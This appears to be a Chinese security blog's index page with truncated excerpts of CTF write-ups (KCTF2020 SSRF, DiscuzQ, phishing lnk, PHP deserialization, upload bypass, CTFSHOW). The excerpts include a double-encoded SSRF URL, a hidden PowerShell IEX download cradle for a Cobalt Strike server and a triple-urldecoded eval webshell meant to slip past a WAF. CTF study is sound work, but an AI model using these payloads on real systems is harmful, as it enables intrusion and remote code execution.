[KCTF2020] 第一题 至暗时刻
第一题 至暗时刻 需要ssrf127.0.0.1的8088端口 有正则需要带有 .pediy .com/ 测了一会儿发现使用urlencode两次就可以ssrf了 http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/loadConfig?url=http:...
第一题 至暗时刻 需要ssrf127.0.0.1的8088端口 有正则需要带有 .pediy .com/ 测了一会儿发现使用urlencode两次就可以ssrf了 http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/loadConfig?url=http:...
DiscuzQ 西湖过去好久了。没想到环境还在。赶紧来复现下 看着赵总博客一步一步复现下来的。。赵总yydstxdy https://www.zhaoj.in/read-6681.html 具体细节就看赵总博客就可以了。十分详细。不再赘述了。 这里主要讲一下我复现的过程 ...
The King Of Phish (Victim Bot) lnk命令执行,测试后发现携带参数不能超过一个`可以把空格替换成tab就执行了,cs起一个web C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-obje...
Signin <?php class flag { public $ip; public $check; } class ip { public $ip; } $ip = new ip(); $flag = new flag(); $flag->ip = $ip; echo urlencode(serialize($flag)); ?> ...
首先找到反序列化点 发现flag.php中含有 即要用ssrf内网读取flag 首先找一下反序列化的点,反序列化初始也就是 wakeup destruct 全局搜索下 看了下 两个都不太能成功,所以找一下wakeup 全局只有一个,所以只能从这里跟下了 跟进...
New Upload 文件上传 测试以后发现除php后缀都能传上去。。 后来发现 0a污染就能传php了 然后就是绕宝塔waf和disable_function 测试后发现宝塔waf不能解析三次url编码。。 <?php eval(urldecode(urldecode(urldecode($_PO...
CTF.SHOW 此文章记录CTFSHOW的WEB入门系列,由于前面较为简单,所以采用倒叙模式,后面还是有很多小trick的 WEB 139 cut命令盲注 import requests import time str = "1234567890-flagbcdefh{}" flag = "flag{" f...
前文请参考 https://old-blog.manqiu.top/2020/06/05/java-learn-1/ 面向对象核心技术 类的封装 封装是面向对象编程的核心思想,封装的载体是类,且对象的属性和行为被封装在这个类中。 看了一下书上给的例子,感觉蛮奇怪的,她并没...
在DASCTF七月赛中,出现了一道homebrew的题目,那个题目为BUU这个题目的简化版,前面执行命令基本相似,使用HASH拓展攻击 本文主要讲述后半部分调用java2用户拿到flag的过程 执行命令请参考: https://old-blog.manqiu.top/2020/07/25...